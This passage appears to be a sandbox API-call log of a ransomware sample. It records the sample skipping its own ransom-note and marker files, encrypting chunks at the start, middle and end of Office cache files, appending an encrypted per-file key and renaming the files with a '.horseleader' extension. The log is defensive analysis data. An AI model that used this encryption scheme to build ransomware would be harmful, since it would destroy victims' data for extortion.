\r\ntell your unique ID\r\n") returned 1508 [0198.548] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0198.549] lstrlenA (lpString="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") returned 1368 [0198.549] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0198.549] CloseHandle (hObject=0x1cc) returned 1 [0198.550] GetProcessHeap () returned 0x780000 [0198.550] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0198.550] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-00A1-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92572~1")) returned 1 [0198.550] lstrcmpiW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0198.550] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C") returned 66 [0198.550] lstrcmpW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0198.550] lstrcmpW (lpString1="{90140000-00A1-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0198.550] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0198.550] GetProcessHeap () returned 0x780000 [0198.550] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0198.550] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*") returned 68 [0198.550] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0198.555] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0198.555] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\.") returned 68 [0198.555] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0198.555] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0198.555] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0198.555] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0198.555] lstrlenW (lpString=".testttjffg") returned 11 [0198.555] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0198.555] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0198.555] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, 
pdwDataLen=0x32af044*=0x80) returned 1 [0198.555] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0198.555] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0198.555] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0198.555] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\..") returned 69 [0198.555] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0198.555] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0198.555] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0198.556] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0198.556] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0198.556] lstrlenW (lpString=".testttjffg") returned 11 [0198.556] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0198.556] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0198.556] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0198.556] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0198.556] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5914a30, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OneNoteMUI.msi", cAlternateFileName="ONENOT~1.MSI")) returned 1 [0198.556] lstrcmpiW (lpString1="OneNoteMUI.msi", lpString2="Windows") returned -1 [0198.556] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 81 [0198.556] StrStrIW (lpFirst="OneNoteMUI.msi", lpSrch=".horseleader") returned 0x0 [0198.556] lstrcmpW (lpString1="OneNoteMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0198.556] lstrcmpW (lpString1="OneNoteMUI.msi", lpString2="_uninstalling_.png") returned 1 [0198.556] lstrlenW (lpString=".testttjffg") returned 11 [0198.556] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi", lpSrch=".testttjffg") returned 0x0 [0198.556] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0198.556] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 
[0198.557] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0198.557] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 81 [0198.557] StrStrW (lpFirst="OneNoteMUI.msi", lpSrch=".txt") returned 0x0 [0198.557] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2503680) returned 1 [0198.557] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.557] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0198.561] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0198.561] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0198.562] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12f200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.562] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0198.573] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | 
out: lpNewFilePointer=0xffffffff) returned 1 [0198.573] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0198.573] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x25e400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.573] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0198.575] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0198.576] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0198.576] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.576] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0198.576] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0198.576] CloseHandle (hObject=0x21c) returned 1 [0199.942] GetProcessHeap () returned 0x780000 [0199.942] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0199.942] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.horseleader") returned 93 [0199.943] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.horseleader")) returned 1 [0199.943] GetProcessHeap () returned 0x780000 [0199.943] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0199.944] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58ed930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x646, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OneNoteMUI.xml", cAlternateFileName="ONENOT~1.XML")) returned 1 [0199.944] lstrcmpiW (lpString1="OneNoteMUI.xml", lpString2="Windows") returned -1 [0199.944] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 81 [0199.944] StrStrIW (lpFirst="OneNoteMUI.xml", lpSrch=".horseleader") returned 0x0 [0199.944] lstrcmpW (lpString1="OneNoteMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0199.944] lstrcmpW (lpString1="OneNoteMUI.xml", lpString2="_uninstalling_.png") returned 1 [0199.944] lstrlenW (lpString=".testttjffg") returned 11 [0199.944] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpSrch=".testttjffg") 
returned 0x0 [0199.944] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0199.944] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0199.944] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0199.945] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 81 [0199.945] StrStrW (lpFirst="OneNoteMUI.xml", lpSrch=".txt") returned 0x0 [0199.945] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1606) returned 1 [0199.945] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x646, lpOverlapped=0x0) returned 1 [0200.410] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff9ba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0200.410] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x646, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x646, lpOverlapped=0x0) returned 1 [0200.410] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.410] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, 
lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0200.411] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0200.411] CloseHandle (hObject=0x21c) returned 1 [0200.411] GetProcessHeap () returned 0x780000 [0200.411] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0200.411] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.horseleader") returned 93 [0200.412] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.horseleader")) returned 1 [0200.413] GetProcessHeap () returned 0x780000 [0200.413] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0200.413] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x36db9d00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x36db9d00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5e95540, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10a5df8, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OnoteLR.cab", cAlternateFileName="")) returned 1 [0200.413] lstrcmpiW (lpString1="OnoteLR.cab", lpString2="Windows") returned -1 [0200.413] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 78 [0200.413] StrStrIW (lpFirst="OnoteLR.cab", lpSrch=".horseleader") returned 0x0 [0200.413] lstrcmpW (lpString1="OnoteLR.cab", lpString2="#Decrypt#.txt") returned 1 [0200.413] lstrcmpW (lpString1="OnoteLR.cab", lpString2="_uninstalling_.png") returned 1 [0200.413] lstrlenW (lpString=".testttjffg") returned 11 [0200.413] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpSrch=".testttjffg") returned 0x0 [0200.413] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0200.414] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0200.414] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0200.415] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 78 [0200.415] StrStrW (lpFirst="OnoteLR.cab", lpSrch=".txt") returned 0x0 [0200.415] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=17456632) returned 1 [0200.415] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.415] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0201.376] 
SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0201.376] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0201.376] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x8506fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.376] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0201.632] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0201.633] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0201.633] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x10a0df8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.633] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0202.192] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0202.192] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0202.193] 
SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.193] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0202.193] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0202.193] CloseHandle (hObject=0x21c) returned 1 [0202.193] GetProcessHeap () returned 0x780000 [0202.193] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0202.194] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.horseleader") returned 90 [0202.194] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.horseleader")) returned 1 [0202.195] GetProcessHeap () returned 0x780000 [0202.195] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0202.195] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, 
